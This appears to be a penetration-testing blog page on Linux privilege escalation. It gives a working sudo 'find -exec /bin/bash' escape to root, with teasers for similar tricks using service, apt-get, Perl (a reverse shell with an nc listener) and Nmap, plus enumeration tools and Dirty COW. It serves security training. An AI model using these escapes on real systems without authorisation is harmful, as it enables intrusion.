find Linux command can help us escape from a restricted shell, if you get to run the program with higher privileges, like NOPASWD entry in /etc/sudoers. How to 1. sudo -l 2. sudo find . -exec /bin/bash \;
find – privilege escalation
read more
Search Results
linux
service – Privilege Escalation
Sudo (NOPASSWD) service - Privilege Escalation If you ever get to run “service” command with root privileges, you can escape from restricted shell to root. In this example /etc/sudoers has allowed an user to run this program as root without password need. How to 1....
apt-get – Privilege escalation
apt-get - Privilege escalation apt-get can be used to escalate privileges when sudo is allowed without password. How to 1. check the permissions this user has sudo -l We can see that /usr/bin/apt-get is allowed (NOPASSWD) 2. get into changelog documentation sudo...
linux-exploit-suggester – Enumeration Linux kernelLinux-based machine
LES tool is designed to assist in detecting security deficiencies for given Linux kernel/Linux-based machine. https://github.com/mzet-/linux-exploit-suggester Execute 1. Download the tool git clone https://github.com/mzet-/linux-exploit-suggester.git cd ls 2. Start...
LinEnum – Linux config enumeration
The art of privilege escalation is a skill that any competent hacker should possess. It's an entire field unto itself, and while it's good to know how to perform the techniques involved manually, it's often more efficient to have a script automate the process. LinEnum...
Linux config enumeration – linuxprivchecker
This script is intended to be executed locally on a Linux box to enumerate basic system info and search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text passwords and applicable exploits....
Linux config enumeration – unix-privesc-checkLinux
Unix-privesc-checker is a script that runs on Unix systems (tested on Solaris 9, HPUX 11, Various Linuxes, FreeBSD 6.2). It tries to find misconfigurations that could allow local unprivilged users to escalate privileges to other users or to access local apps...
(CVE-2016-5195)[Privilege Escalation] – Dirtycow -‘PTRACE_POKEDATA’ Race Condition
Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka...
Perl – privilege escalation
Using Pearl to elevate privileges using a reverse shell. Exploit 1. Check sudo permissions sudo -l 2. Start a listener on Kali/Parrot nc -lvnp 4445 3. run perl using sudo as no password is required. sudo /usr/bin/perl -e 'use...
Nmap – privilege escalation
Nmap is a scanner for network and OS services detection. However, if misconfigured to be used with “sudo” or “administrator” privileges can lead to a privilege escalation. Exploit 1 1. Check what sudo permission the current user has, desired “NOPASSWD” sudo -l 2....